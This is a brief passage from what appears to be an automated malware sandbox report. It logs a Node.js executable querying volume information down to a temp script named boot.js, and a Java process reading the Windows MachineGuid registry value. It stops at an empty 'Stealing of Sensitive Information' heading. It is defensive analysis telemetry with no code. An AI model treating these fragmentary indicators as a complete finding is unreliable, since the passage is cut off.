                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeQueries volume information: C:\Users\user VolumeInformationJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeQueries volume information: C:\Users\user\AppData VolumeInformationJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE VolumeInformationJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js VolumeInformationJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information: